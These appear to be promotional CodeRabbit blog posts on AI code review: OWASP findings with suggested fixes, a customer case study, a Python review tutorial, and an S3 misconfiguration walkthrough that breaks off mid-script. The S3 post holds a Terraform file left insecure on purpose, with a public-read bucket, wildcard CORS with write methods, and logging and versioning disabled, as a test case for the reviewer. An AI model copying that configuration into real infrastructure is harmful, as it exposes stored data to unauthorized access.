![](https://victorious-bubble-f69a016683.media.strapiapp.com/1fad2ae0f1c11df3f5c83db70351eef2191d0e7472114533c999eded19cf4cee_76158f4c99.png)

CodeRabbit identified that the routing configuration does not enforce proper access control, particularly for the `/dashboard` route. This can allow unauthorized users to reach sensitive parts of the application without authenticating. This issue falls under Broken Access Control (A01:2021), a critical security risk identified by OWASP. Without proper verification, users may access parts of the application they shouldn't, leading to unauthorized actions or data exposure.

CodeRabbit suggests implementing a `ProtectedRoute` component that checks for user authentication before allowing access to sensitive routes such as `/dashboard`. This ensures that only authenticated users can navigate to restricted areas, preventing unauthorized access and protecting sensitive data. Check out the [review comment](https://github.com/coderabbitai/coderabbit-pr-review/pull/1#discussion_r1867619348) for more details.

### **Cryptographic Failures (A02:2021)**

![](https://victorious-bubble-f69a016683.media.strapiapp.com/cc0f22a5b285ce0c51bec426e1557009629c1eb633d9a87d0690ffbcaf6a9162_698407a14c.png)

CodeRabbit identified that the `hash_password` function uses MD5 for password hashing. MD5 is considered weak: it is fast to compute, which makes brute-forcing stored hashes cheap, and it is vulnerable to collision attacks.
This falls under OWASP's Cryptographic Failures (A02:2021) risk, which highlights the importance of using strong cryptographic algorithms to protect sensitive data like passwords.

To resolve it, CodeRabbit suggests using a stronger, purpose-built password hashing algorithm like bcrypt or Argon2. For this application, a convenient option is the `generate_password_hash` function from the `werkzeug.security` module, which is designed for secure password hashing and provides better protection against potential attacks. Check out the [review comment](https://github.com/coderabbitai/coderabbit-pr-review/pull/1#discussion_r1867619376) for more details.

### **SQL Injection (A03:2021)**

![](https://victorious-bubble-f69a016683.media.strapiapp.com/7d0936a7ccf970d9f4210408f12d1be357a0a66f7df45acf221e2b3f22d0d926_cf0bc43066.png)

The current implementation directly concatenates user input into the SQL query, which exposes the application to SQL injection attacks. This falls under the OWASP Injection (A03:2021) risk: improperly handled user input in SQL queries can allow attackers to execute arbitrary SQL code.

To protect against SQL injection, CodeRabbit suggests parameterized queries instead of string formatting. User inputs are passed to the query as parameters, so the database treats them as values rather than executable code. Refer to the [review comment](https://github.com/coderabbitai/coderabbit-pr-review/pull/1#discussion_r1867619370) for more information.

### **Insecure Design (A04:2021)**

![](https://victorious-bubble-f69a016683.media.strapiapp.com/2ef33c7d5e5ee9dafdbc066dfac4b04b11e4edd4e2a8a2dd2a334d63c5e712a2_cb89a653d7.png)

CodeRabbit flagged multiple security concerns in the current API implementation: a hardcoded API URL, no CSRF protection, no password strength validation, and no rate limiting for brute-force protection.
These issues fall under the OWASP Insecure Design (A04:2021) risk, which highlights the importance of designing applications with built-in security features to prevent common vulnerabilities.

To mitigate this risk, CodeRabbit recommends moving the API URL to an environment variable, implementing CSRF protection by adding a token to requests, enforcing strong password validation before submission, and applying rate limiting to defend against brute-force attacks. You can read the [code review comment](https://github.com/coderabbitai/coderabbit-pr-review/pull/1#discussion_r1867619393) to know more.

### **Security Misconfiguration (A05:2021)**

![](https://victorious-bubble-f69a016683.media.strapiapp.com/105333b9ee30359a927285fa6834d7144ec2db02cb9ecd89ebcbfd6e9a36bf91_96937c4cb1.png)

Running Flask in debug mode exposes sensitive information, such as stack traces and detailed error messages, which attackers can exploit. CodeRabbit identified this issue and flagged it as a security risk. This practice falls under the OWASP Security Misconfiguration (A05:2021) risk: enabling debug mode in a production environment gives attackers insight into the application's inner workings, significantly increasing the chances of a successful attack.

To resolve this, CodeRabbit suggests disabling debug mode in production environments. This can be achieved by using environment variables to enable debug mode only in the development environment, ensuring that sensitive information is not exposed in production. Refer to the [review comment](https://github.com/coderabbitai/coderabbit-pr-review/pull/1#discussion_r1867619351) for more details.
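
The three backend fixes suggested in the sections above (stronger password hashing, parameterized queries, and opt-in debug mode) can be sketched in a few lines of Python. This is a minimal sketch rather than the demo app's actual code: the function names, the `users` table layout, and the `debug_enabled` helper are assumptions made for illustration, and the standard library's PBKDF2 stands in for bcrypt, Argon2, or Werkzeug's `generate_password_hash` so that the example runs without extra dependencies.

```python
import hashlib
import hmac
import os
import sqlite3

# Assumption: all names below are illustrative, not taken from the demo repository.
PBKDF2_ITERATIONS = 600_000


def hash_password(password: str) -> str:
    """Return a salted, deliberately slow hash (PBKDF2 standing in for bcrypt/Argon2)."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return f"{salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute the hash with the stored salt and compare in constant time."""
    salt_hex, digest_hex = stored.split("$")
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), PBKDF2_ITERATIONS
    )
    return hmac.compare_digest(candidate.hex(), digest_hex)


def find_user(conn: sqlite3.Connection, username: str):
    """Parameterized query: the driver binds `username` as a value, never as SQL text."""
    cur = conn.execute(
        "SELECT id, username, password_hash FROM users WHERE username = ?",
        (username,),
    )
    return cur.fetchone()


def debug_enabled(env=os.environ) -> bool:
    """Debug mode is opt-in: off unless FLASK_DEBUG is explicitly set to a truthy value."""
    return env.get("FLASK_DEBUG", "0").lower() in {"1", "true"}
```

In a Flask entry point, the last helper would typically be passed along as `app.run(debug=debug_enabled())`, so debug mode stays off unless a developer explicitly sets `FLASK_DEBUG` locally.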
### Other Security Risks Detected by CodeRabbit

In addition to the OWASP violations mentioned, CodeRabbit identified other critical security issues, including broken authentication, insecure data storage, unvalidated input, potential XSS vulnerabilities, and more. These flaws could compromise sensitive data and allow unauthorized access.

![](https://victorious-bubble-f69a016683.media.strapiapp.com/c42dcad7452dab8d49474db10e5b932f1a8c518d0062a7ba46b114603cf4175c_6603c8bd42.png)

![](https://victorious-bubble-f69a016683.media.strapiapp.com/09c7c65f13537d6dc8f89e88f58e4eaddf1a60ded7342a00829bbf6936877826_9618d53fbc.png)

To mitigate these risks, it’s recommended that tokens be securely stored, proper session management enforced, route protection implemented, and other security concerns addressed. This will significantly strengthen the application's overall security. Refer to the various security-related [code review comments](https://github.com/coderabbitai/coderabbit-pr-review/pull/1#discussion_r1867619374) to know more.

## Summary

Addressing OWASP vulnerabilities through automated code reviews is crucial for maintaining secure and reliable applications. By continuously scanning for potential issues, these tools help identify security flaws, misconfigurations, and code inefficiencies early in the development process, before they make it to production.

[CodeRabbit](https://www.coderabbit.ai/)’s ability to identify vulnerabilities and recommend best practices makes it a handy tool for developers who want to maintain high security standards. By detecting critical flaws early, CodeRabbit empowers developers to create safer software without compromising efficiency. Its automated code review capabilities streamline the workflow, allowing teams to focus on building applications without the burden of manual security checks.
Don't wait for a breach. [Sign up](https://app.coderabbit.ai/login?free-trial) today and safeguard your code.

How Bluecopa Leveraged CodeRabbit to Reduce Bugs in Production

Sahil Mohan Bansal — Fri, 06 Dec 2024 00:00:00 GMT

Bluecopa is a leading finance vertical platform that delivers a cloud-based application to help its customers automate financial planning and analysis processes and improve data precision, leading to more data-driven business decisions for finance teams. Bluecopa sought to streamline its development process, improve code quality, and foster a collaborative engineering culture across its team of 25+ engineers. By leveraging CodeRabbit, Bluecopa achieved significant improvements in software release efficiency and code quality. This case study delves into the challenges faced by Bluecopa, the implementation of CodeRabbit, and the resulting benefits.

### **Business Challenges**

As Bluecopa rapidly scaled its engineering team, maintaining code quality and consistency became increasingly challenging. Manual code reviews were time-consuming and often overlooked critical issues. The team looked for modern solutions to automate different aspects of their software development lifecycle, including the code review process. They were already using GitHub Copilot and Cursor for AI-powered code development and Claude by Anthropic for data analysis, and now they were looking to add more agility to the code review stage.

> "CodeRabbit's suggestions were really precise. We are now paying a lot of attention to typos, naming conventions, and the placement of types. It's fascinating and truly a proactive painkiller." - Ravi, Head of Engineering, Bluecopa

### **Looking for an AI-powered Solution**

Bluecopa’s CEO is a 3x startup founder who has emphasized using cutting-edge solutions for the company's engineering teams. Those teams use AI extensively to make the product development lifecycle more agile and easier to manage. They discovered CodeRabbit while specifically looking for AI solutions in the code review space that could reduce the manual effort for developers and free up their time to focus on writing code.
At the same time, the code review quality needed to meet a high bar so that it could replace the human effort in the first pass of code reviews. They looked at other products before CodeRabbit and eventually started to use CodeRabbit more frequently after being delighted with the quality of the AI-powered comments and feedback generated directly on the developer’s pull request.

### **CodeRabbit Benefits**

Bluecopa implemented CodeRabbit to address these challenges. They integrated CodeRabbit’s SaaS app with their GitHub organization, which enabled their team to:

* **Get started in two minutes:** All it takes to use CodeRabbit is a simple integration with the GitHub organization, and Bluecopa was up and running with AI code reviews in just two minutes.
* **Fewer bugs in production:** After implementing CodeRabbit, the engineering teams at Bluecopa immediately saw fewer bugs going into production. This saves developers a huge amount of time, because they can fix issues well before they reach customers.
* **User-reinforced learnings:** Bluecopa engineers found the CodeRabbit comments in their GitHub pull requests to be very meaningful. They started interacting with the bot through a chat interface within the first week, which made it easier to understand why the underlying AI was flagging potential issues such as syntax errors, style violations, and security vulnerabilities.
* **Automated test cases:** Without AI, Bluecopa’s fast-moving engineering teams were more likely to miss test cases, especially those that cover edge scenarios.
  But CodeRabbit’s AI was able to identify and recommend test cases to include in the code, which improves overall code quality.
* **Foster collaboration:** Once the initial front-end engineering team at Bluecopa was happy with the AI code reviews, they expanded the use case internally by inviting more of their back-end engineering team members and adding more GitHub repositories to be reviewed by CodeRabbit. This facilitated seamless collaboration among team members, enabling knowledge sharing and code quality discussions.

### **Summary**

Bluecopa liked that the review comments were precise and accurate. Without AI, a human engineer doing a manual code review may not be an expert in the programming language the code is written in. With AI, those barriers break down, and AI does the first pass of the reviews better than manual reviews. Bluecopa continues to use CodeRabbit and is looking forward to the new features on the roadmap, such as Bitbucket integration, support for docstrings, a code editor plugin integration, and more!

**Get Started with CodeRabbit**

You can utilize the power of AI Code Reviews with CodeRabbit as well. It takes less than 5 minutes, and no credit card is required, to integrate CodeRabbit with your Git platform. [Start Your Free Trial](https://app.coderabbit.ai/login?free-trial), create a new pull request, and watch AI simplify your code reviews in just a few minutes.

Questions? Reach out to our team for [support](https://www.coderabbit.ai/contact-us).

How to Setup Python Code Reviews With CodeRabbit

Aravind Putrevu — Wed, 04 Dec 2024 00:00:00 GMT

This is the second in a series of posts we intend to write about how to do code reviews as simply and quickly as possible. In the last [article](https://www.coderabbit.ai/blog/how-to-automate-typescript-code-reviews-with-coderabbit), we discussed how CodeRabbit helps boost productivity and spot issues in large TypeScript projects, and it’s worth revisiting.

This time, we’re going a step further: we'll show you how [CodeRabbit improves Python](https://www.b-list.org/weblog/2022/may/13/boring-python-dependencies/) code quality beyond what typical linters can do. By the end, you’ll see how it makes Python code reviews smoother and more efficient.

## **The most common challenges in code review**

Before we start, let’s see why code reviews are **so time-consuming and challenging for reviewers and developers**.

%[https://twitter.com/GergelyOrosz/status/1490042796979404815]

> Code reviews can sometimes be a pain. They're more than just another routine task for developers. Reviewers often go back and forth, nitpicking over preferences instead of real issues. Conflicting opinions? That’s a whole other headache, especially when multiple reviewers disagree. And then there’s the back-and-forth because the dev didn’t get the comments or didn’t hit the expected quality bar. Add unclear expectations, and the whole process can feel like it’s dragging on forever.

These fundamental issues aren’t tied to *Python* or any other programming language specifically; they are common in any code review process. Let’s see what typical challenges developers run into when working specifically with a Python codebase.

## Challenges in Python Code Reviews

### **Code reviews are easy in theory, difficult in practice, especially when it comes to Python.**

As we saw in the introduction, developers have different views on what the goal of a code review is. Some developers think that it’s about finding technical issues; others view it as a tool to verify the functional requirements of the code.
Let’s see what specific challenges we face in a Python code review.

### **Example:**

```python
# The code below demonstrates PEP 8 violations: inconsistent spacing around
# an operator and a camelCase function name (PEP 8 recommends snake_case).
def calculateUserAge(user_birthdate, current_date):
    age = current_date.year -user_birthdate.year  # Inconsistent spacing around the operator
    return age
```

### Type safety and Dynamic typing

* Difficulty in tracking type-related bugs due to Python's dynamic typing
* Confusion about when to use *type* annotations

**Example:**

```python
# Problematic: Lack of clarity on the type of 'data' and its expected methods
# The code assumes 'data' has a 'transform' method, but the type of 'data' is not specified.
def process_data(data):
    return data.transform()  # What type is 'data'? What methods should it have?
```

### Code complexity

Most of the problems in software engineering *do not* come from *unoptimized* code. Most of the problems in software engineering *come* from the mess we have in our code.

%[https://twitter.com/peter_szilagyi/status/1504887154761244673]

* Unnecessary complexity in implementations
* Convoluted logic flows
* Overuse of conditional statements
* Failure to use Python's built-in features

**Example**

```python
from datetime import datetime

# Problematic: Unnecessary complexity and deep nesting
# The code uses multiple nested 'if' statements, which make the logic harder to follow.
def get_user_status(user):
    status = None
    if user.is_active:
        if user.last_login:
            if (datetime.now() - user.last_login).days < 30:
                status = "active"
            else:
                status = "inactive"
        else:
            status = "never_logged_in"
    else:
        status = "disabled"
    return status
```

### Dependencies and Import management

* Circular *imports* and unclear dependency hierarchies
* Mixed absolute/relative imports

**Example:**

```python
# Problematic: Circular import between file1.py and file2.py
# file1.py imports ClassB from file2.py, and file2.py imports ClassA from file1.py.
# This creates a circular dependency that can lead to ImportError or unexpected behavior.

# file1.py
from file2 import ClassB  # Circular import

class ClassA:
    def method(self):
        return ClassB()

# file2.py
from file1 import ClassA  # Circular import

class ClassB:
    def method(self):
        return ClassA()
```

### Code modularization and architecture

* Inconsistent project structure and mixing business logic with infra code
* Unclear separation of concerns

**Example:**

```python
# Problematic: Lack of modularization and responsibility segregation
# The 'create_user' method is performing multiple tasks (validation, database connection,
# sending emails, and logging). This violates the Single Responsibility Principle (SRP)
# and can make the code harder to maintain or extend.
class UserService:
    def create_user(self, data):
        # Validates data
        # Connects to database
        # Sends welcome email
        # Logs to monitoring system
        pass
```

### Bad testing practices

Test coverage is a controversial topic. We don’t think 100% coverage is a good *target*, but we do think you should measure and report coverage during your test runs. Instead of treating it as a target, treat it as a warning signal: if coverage suddenly *drops*, it’s likely a sign that something has gone wrong in either the main codebase or the test suite. And writing tests is cheaper than not writing them.

* Insufficient test coverage and unclear test intentions
* Long and poorly written test suites

**Example:**

```python
# Problematic: Bad testing practice - insufficient validation and lack of edge case testing
# The test only checks if the user is not None, which is not a comprehensive validation of the user creation process.
# The test should verify whether the user was created with correct attributes and handle edge cases such as invalid input,
# missing data, or errors during creation. This test lacks assertions for data correctness and doesn't test failure cases.
def test_user_creation():
    user = create_user("john", "doe", 25)
    assert user is not None  # This assertion is too basic and doesn't validate correctness
```

### Performance Issues

* Inefficient use of data structures and memory leaks
* Unnecessary computations

**Example**

```python
from typing import Optional

# Problematic: O(n) lookup performance issue
# The current implementation performs a linear search (O(n)) through the 'users' list, which can be slow for large datasets.
# As the size of 'users' grows, the lookup time increases linearly, causing performance degradation.
def find_user(users: list, user_id: int) -> Optional[User]:
    for user in users:
        if user.id == user_id:
            return user
    return None
```

### Poor error handling

* Inconsistent error handling patterns
* Too broad exception catching
* Missing error logs

**Example:**

```python
# Problematic: Poor error handling - catching all exceptions and logging them without context
# The code catches all exceptions using a generic 'Exception' class, which can hide specific errors and make debugging difficult.
# Additionally, it only logs the error message without providing useful context about where the error occurred
# or the state of the application.
try:
    do_something()
except Exception as e:
    log.error(e)  # Too generic and lacks context, making debugging harder
```

## Ruff: a fast linter, but there's more to code quality

No doubt [Ruff](https://github.com/astral-sh/ruff) is very fast. Using a linter like **Ruff** can significantly improve code quality, but it also comes with its own challenges: noise, and the need for manual intervention on every PR or change.

### **Examples of Ruff's Limitations:**

1. **Docstring enforcement** - Ruff may flag missing or inconsistent docstrings, which can be annoying in smaller projects.
2. **Code complexity** - Ruff includes rules like the *mccabe* complexity check, which might flag code that is complex but still maintainable in context.
Code refactoring based on these suggestions can sometimes be unnecessary, especially in smaller functions.
3. **Isort integration** - Ruff includes import order checks, which can get noisy, particularly if you have frequent import changes or a dynamically loaded module structure.
4. **Ruff doesn't support custom rules or plugins, which is its most significant current limitation.**

Let us run CodeRabbit on a popular Python repo for developing autonomous AI agents!

## Running CodeRabbit on a CrewAI PR

[**CrewAI**](https://www.crewai.com/) **is a Python framework for orchestrating role-playing autonomous AI agents.**

Let’s test CodeRabbit live on the CrewAI repo:

![Fork of CrewAI](https://victorious-bubble-f69a016683.media.strapiapp.com/7047ff62da1d6869464c612d43962de2b6726d73a18d437fc4cc60df3e84c5e4_cc56709b05.png)

* Go to the [CrewAI GitHub repository.](https://github.com/crewAIInc/crewAI)
* Click the “Fork” button at the top right corner of the page to create a copy of the repo in your own GitHub account.

**Clone the repo to your local machine**:

* Open your terminal or Git Bash.
* Run the following command to clone your fork:

```bash
git clone https://github.com/<your-username>/crewAI.git
```

**Select any existing branch**:

![Code review feedback -demo repo-crewai](https://victorious-bubble-f69a016683.media.strapiapp.com/f134c61bf566ccfe49c7936a5529ad1a51485442e5380f241d8da8332b8677fb_faa5ad004c.png)

* Navigate into your project folder:

```bash
cd crewAI
```

* Switch to an existing branch using:

```bash
git checkout <branch-name>
```

* **Make a small change**:
  * Open the repo in your preferred code editor (e.g., VSCode).
  * Make a small change to any file. For example, add a comment or modify an existing one.
* **Commit the changes**:

```bash
git add .
git commit -m "Made a small change for testing CodeRabbit"
```

* Push your branch back to your forked repo:

```bash
git push origin <branch-name>
```

**Raise a Pull Request (PR)**:

* Go to your GitHub fork and click the “Compare & pull request” button.
* Review your changes and click “Create pull request.”

![Code review feedback on PR](https://victorious-bubble-f69a016683.media.strapiapp.com/1cf788eb3eaee62fe9222de7a1180cef830c26ee255085db15c4d8192918f7e6_0b941a77bb.png)

Create the pull request and see CodeRabbit in action:

![Pull Request Summary by CodeRabbit](https://victorious-bubble-f69a016683.media.strapiapp.com/b4449d843b38e2f8ba055e552f14324fbbffac6d648ba003fb4ba461c3435c8b_0bd0c5dc76.png)

💡

Yes, that’s it. Getting started is that simple: the review begins once you create a PR.

## Important — Activating CodeRabbit for Your Fork ![Configure using CodeRabbit UI for each repository](https://victorious-bubble-f69a016683.media.strapiapp.com/54e816c742af0fc74f044b0afb4a6697b70ba5ccf48a533b179061c54077b4a2_01d20bffdd.png)

💡

Not seeing CodeRabbit in action on your PR? Here's a quick checklist:

1. Ensure you're logged in to CodeRabbit using your GitHub account
2. Add your forked repository to the CodeRabbit dashboard at [https://app.coderabbit.ai/settings/repositories](https://app.coderabbit.ai/settings/repositories)

> **Pro Tip**: CodeRabbit only reviews repositories that are explicitly added to your dashboard. If you don't see the AI reviewer on your PR, this is likely the reason.

For more detailed setup instructions, visit the CodeRabbit [documentation](https://docs.coderabbit.ai/configure-coderabbit).

## Key findings in CodeRabbit review

Let’s look at some of the results from **CodeRabbit**'s review of this [pull request](https://github.com/tyaga001/crewAI/pull/3). Here are the key findings:

1. **Special Methods Enhancement:**
   * *\_\_getitem\_\_* method needs better error handling
   * TODO comment needs to be addressed before merging
   * Suggestion to validate key types and handle KeyError exceptions

   ![key findings from CodeRabbit's code review](https://victorious-bubble-f69a016683.media.strapiapp.com/78e135a2ace2a88415c0ffa13eb834ad911d914bf6d0276b34a54afae1819520_67ae3f2697.png)

2. **File Operations Issues:**
   * Duplicate initialization logic between methods
   * Potential race condition identified in append method
   * Need for proper error handling in file operations
   * Missing UTF-8 encoding specification

   ![File Operations Issues](https://victorious-bubble-f69a016683.media.strapiapp.com/905821ca77754aa82da8beaf4724b6c64d27d8e53b735efdf719d72175aaf9fe_39f9dbcfcd.png)

3. **Test Coverage Gaps:**
   * Missing test coverage for *TaskOutputJsonHandler*
   * While *PickleHandler* is tested, JSON handler implementation needs coverage
4. **Task Creation Redundancy:**
   * Potential duplicate task creation in *kickoff\_for\_each\_async*
   * Risk of tasks being scheduled multiple times

For the complete review and discussion, check out the [PR](https://github.com/tyaga001/crewAI/pull/3).

The best part?
CodeRabbit suggests the 1-click fixes right in the code review comment. ![For quick fixes, CodeRabbit offers one button solution to commit AI recommended changes.](https://victorious-bubble-f69a016683.media.strapiapp.com/cd123dea14b8b993e236fe9ec4cad5b0be0b0a6179015ce2103df6eca003ac05_974b72bc01.png) No more back-and-forth between developer and reviewer in PR comments. We understand that you may have experimented with various linters or other AI tools for code review, but CodeRabbit seamlessly integrates into the GitHub workflow without any additional steps. Simply create a pull request, wait approximately five minutes, and you'll receive a comprehensive analysis of code issues before any manual review takes place. If you're a developer or a founder who conducts [code reviews](https://coderabbit.ai) frequently, consider the time spent on minor issues like formatting adjustments, naming conventions, or optimizing loops. With CodeRabbit, you can shift your focus to more critical aspects, such as evaluating whether the code effectively addresses user needs or assessing its stability for production deployment. ## Transform Your Python Code Reviews from Pain Points to Productivity We've explored the common challenges in Python code reviews, from PEP8 compliance to complex architectural issues, and showed how CodeRabbit goes beyond traditional linters to provide intelligent, context-aware solutions. By automating the tedious aspects of code review, CodeRabbit helps teams focus on what truly matters - building great software. Sign up to [**CodeRabbit**](https://app.coderabbit.ai/login?free-trial) for a free trial and experience automatic reviews that enhance your application's quality while helping your team work faster and better. You can also join the [**Discord channel**](https://discord.gg/coderabbit) to connect with a community of developers, share insights, and discuss the projects you're working on. PS: It is free for Open-source projects.

How to Catch S3 Misconfigurations Early with Automated AI Code Reviews

Atulpriya Sharma — Tue, 26 Nov 2024 00:00:00 GMT

Amazon S3 (Simple Storage Service) is a widely used cloud storage solution that allows users to store and manage data, including [backups](https://docs.aws.amazon.com/aws-backup/latest/devguide/getting-started.html), [static websites](https://docs.aws.amazon.com/AmazonS3/latest/userguide/WebsiteHosting.html), and other files using buckets. While S3 offers [significant flexibility and scalability](https://www.allthingsdistributed.com/2023/07/building-and-operating-a-pretty-big-storage-system.html), it also presents challenges such as ensuring proper access controls, managing data lifecycle policies, and maintaining security against unauthorized access. Misconfigured S3 buckets can lead to significant breaches, as seen in the [FedEx incident](https://www.infosecurity-magazine.com/news/fedex-s3-bucket-exposes-private/), where an unsecured bucket exposed over 119,000 sensitive customer documents. Cloud misconfigurations are among the leading attack vectors for cybercriminals, with recent [industry reports](https://www.strongdm.com/blog/cloud-security-statistics) indicating they account for around 15% of all data breaches. These vulnerabilities often happen because cloud environments are complex, and the pressure to release software quickly can make it hard to keep security measures in check. Integrating security early in the development process is crucial to addressing this challenge. Code Review can play an essential role by ensuring best practices and security measures are in place right from the beginning. To assist with this, CodeRabbit integrates with the development pipeline and automatically reviews configuration files. It identifies potential vulnerabilities in S3 configurations, ensuring storage buckets are secure while allowing development teams to maintain efficiency. ## Common Misconfigurations in S3 Buckets S3 buckets are a powerful cloud storage solution, but improper configurations can expose sensitive data, leading to severe breaches. 
Developers sometimes delay changes to configurations with the mindset of "I'll fix it later," leaving vulnerabilities like misconfigured access controls unchecked. Over time, these unresolved issues can make their way into production environments, creating significant security risks. As seen in the [Capita incident](https://www.theregister.com/2023/05/22/capita_security_pensions_aws_bucket_city_councils/), misconfigured AWS S3 buckets exposed sensitive pension data and affected several local city councils in the UK.

Even minor misconfigurations can lead to potentially disastrous consequences. Some of the major misconfigurations are:

* **Public Website Assets Spillage**: Teams often configure S3 buckets for hosting static assets like images and stylesheets. However, if the bucket’s public access settings are not carefully managed, sensitive resources like database backups, configuration files, or logs may be accidentally exposed to the public. Such exposure can lead to severe legal repercussions, loss of trust, and potential financial penalties due to regulatory non-compliance.

  ![](https://victorious-bubble-f69a016683.media.strapiapp.com/d3f020d0b7c381cf811d5e2dc3fb3538b17993373f1a9521ded16d8e8efc55a1_9cb865bbc7.png)

* **Cross-Environment Access**: Development, staging, and production environments often require separate S3 buckets to manage different stages of the application lifecycle. However, issues arise when policies or permissions from the production environment are mistakenly copied to the development or staging buckets, allowing unintentional access. Additionally, wildcard IAM principals grant broad permissions, opening the door to unauthorized access. The result can be data leaks or manipulations that compromise the integrity of production data and lead to significant operational disruptions.

  ![](https://victorious-bubble-f69a016683.media.strapiapp.com/61f1efa10b136abc8f7e79cd98214b5908f80d25a3af9ff5bc014a6439edb50f_f21c0bb2c0.png)

* **Third-Party Integrations**: Many businesses integrate S3 with external services such as Content Delivery Networks (CDNs) or analytics tools to enhance performance and functionality. If bucket policies are not carefully crafted, they may grant overly broad access to third-party services, increasing the risk of unauthorized data exposure. Additionally, failing to implement IP restrictions can widen this vulnerability further, leading to data breaches or data loss.

  ![](https://victorious-bubble-f69a016683.media.strapiapp.com/50cf3b164e82c080b6cb71d3cf8f53b50d1aa8f0a55e217c91efcadb637541e9_3116c31978.png)

* **Logging & Auditing Issues**: Proper logging is essential for monitoring access and changes to S3 buckets. However, some teams may set up logging without adequate configurations or inadvertently create policies that lead to the automatic deletion of logs. Without proper access controls for logs, organizations may find it challenging to investigate incidents or ensure compliance with regulatory requirements. Inadequate logging can hinder incident response efforts and leave organizations vulnerable during audits or investigations into breaches.

  ![](https://victorious-bubble-f69a016683.media.strapiapp.com/82383928ee0141549cf3882acce96cbcca6981056ee4dcbebd23a6ef14a9c9bb_8b1b7fcce4.png)

CodeRabbit offers a proactive solution to these challenges by integrating security checks into the development lifecycle. It helps detect possible security vulnerabilities, like incorrectly configured S3 bucket access or overly permissive IAM policies, by automatically examining configuration files at the beginning of the CI/CD process. This approach ensures that issues like public website asset spillage, cross-environment access risks, or inaccurate logging setups are detected early, well before they reach production.
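To make the wildcard-principal risk described above more concrete, here is a minimal sketch in Python of the kind of check a reviewer might automate. It is not CodeRabbit's implementation: the helper `find_risky_statements`, the sample policy, the bucket name, and the role ARN are all hypothetical and exist only for illustration. The check only looks at `Allow` statements whose `Principal` is `*` or contains `*`.

```python
import json


def _is_wildcard_principal(principal):
    """Return True when a policy Principal grants access to everyone."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        for value in principal.values():
            # A principal value may be a single string or a list of strings.
            values = value if isinstance(value, list) else [value]
            if "*" in values:
                return True
    return False


def find_risky_statements(policy_json):
    """Return the Sid (or a positional label) of each Allow statement with a wildcard principal."""
    policy = json.loads(policy_json)
    statements = policy.get("Statement", [])
    if isinstance(statements, dict):  # a single statement may be given as an object
        statements = [statements]
    risky = []
    for index, statement in enumerate(statements):
        allows = statement.get("Effect") == "Allow"
        if allows and _is_wildcard_principal(statement.get("Principal")):
            risky.append(statement.get("Sid", f"statement-{index}"))
    return risky


# Hypothetical policy, for illustration only.
SAMPLE_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
         "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-bucket/*"},
        {"Sid": "TeamWrite", "Effect": "Allow",
         "Principal": {"AWS": "arn:aws:iam::123456789012:role/example-role"},
         "Action": "s3:PutObject", "Resource": "arn:aws:s3:::example-bucket/*"},
    ],
})

if __name__ == "__main__":
    print(find_risky_statements(SAMPLE_POLICY))  # prints ['PublicRead']
```

A real review would also need to consider `Condition` blocks, which can legitimately narrow a wildcard principal, so a hit from a check like this is a prompt for a closer look rather than a verdict.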
## Demonstrating CodeRabbit’s Security Detection in S3 Configurations To showcase CodeRabbit's ability to detect security vulnerabilities, we deliberately introduced typical misconfigurations in our S3 setup, including overly permissive bucket policies, lack of encryption, and incorrect lifecycle settings. With a quick two-click setup, we [integrated CodeRabbit](https://coderabbit.ai/blog/how-to-integrate-ai-code-review-into-your-devops-pipeline) into our repository, where it seamlessly identified these security risks in real-time. Upon submitting a pull request, the system automatically reviews the files and produces a detailed report with these key sections: **Summary**: A brief overview of the significant changes identified, emphasizing areas requiring attention. **Walkthrough**: A detailed, step-by-step breakdown of the reviewed files, pointing out specific issues and offering suggestions for improvement. **Table of Changes**: A table outlining all file changes along with a summary for each, helping prioritize actions. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/b8d99ba53e8f5c8148eac0123c7889b9cc57d9969c2b90663ec52cb97958f25d_f2c8e3e250.png) ![](https://victorious-bubble-f69a016683.media.strapiapp.com/a7624ccf2691192c07939fceaa3eedcead43bc61f16eace48c158c12c56aec9c_2a97e5a66e.png) Here’s the sample terraform file that bootstraps a bucket with specific policies, which we will use to demonstrate CodeRabbit's capabilities in detecting S3 misconfigurations. 
```hcl
provider "aws" {
  region = "eu-north-1"
}

resource "aws_s3_bucket" "data_lake_bucket" {
  bucket = "coderabbit-s3-data-lake-demo"
  acl    = "public-read"

  versioning {
    enabled = false
  }

  encryption {
    sse_algorithm = "AES256"
  }

  lifecycle {
    prevent_destroy = false
  }

  cors_rule {
    allowed_headers = ["*"]
    allowed_methods = ["GET", "POST", "PUT"]
    allowed_origins = ["*"]
    max_age_seconds = 3000
  }

  logging {
    target_bucket = "coderabbit-s3-data-lake-demo-logs"
    target_prefix = "logs/"
    enabled       = false
  }

  tags = {
    Environment = "Analytics"
    Purpose     = "Data Lake Storage"
  }
}

resource "aws_s3_bucket_object" "raw_data_object" {
  bucket = aws_s3_bucket.data_lake_bucket.bucket
  key    = "raw_data/customer_data.csv"
  source = "customer_data.csv"
}

resource "aws_s3_bucket_object" "processed_data_object" {
  bucket = aws_s3_bucket.data_lake_bucket.bucket
  key    = "processed_data/sales_data.parquet"
  source = "sales_data.parquet"
}

resource "aws_s3_bucket_lifecycle_configuration" "data_lake_lifecycle" {
  bucket = aws_s3_bucket.data_lake_bucket.bucket

  rule {
    id      = "Move raw data to Glacier"
    enabled = true
    prefix  = "raw_data/"

    transition {
      days          = 30
      storage_class = "GLACIER"
    }

    expiration {
      days = 365
    }
  }
}

resource "aws_s3_bucket_public_access_block" "data_lake_public_access_block" {
  bucket              = aws_s3_bucket.data_lake_bucket.bucket
  block_public_acls   = true
  block_public_policy = true
}

output "bucket_name" {
  value = aws_s3_bucket.data_lake_bucket.bucket
}
```

The Terraform file performs the following operations:

1. Configures the AWS provider and creates the S3 bucket.
2. Sets a public-read ACL and AES256 encryption, and leaves versioning disabled.
3. Adds CORS rules and a logging configuration (with logging disabled).
4. Uploads raw and processed data files.
5. Defines lifecycle rules and object expiration.
6. Blocks public access and outputs the bucket name.

Here is the uploadFile.js script that uploads raw and processed data files to an S3 bucket.
```javascript
const AWS = require('aws-sdk');
const fs = require('fs');

const s3 = new AWS.S3({
  region: 'eu-north-1',
});

const bucketName = 'coderabbit-s3-data-lake-demo';
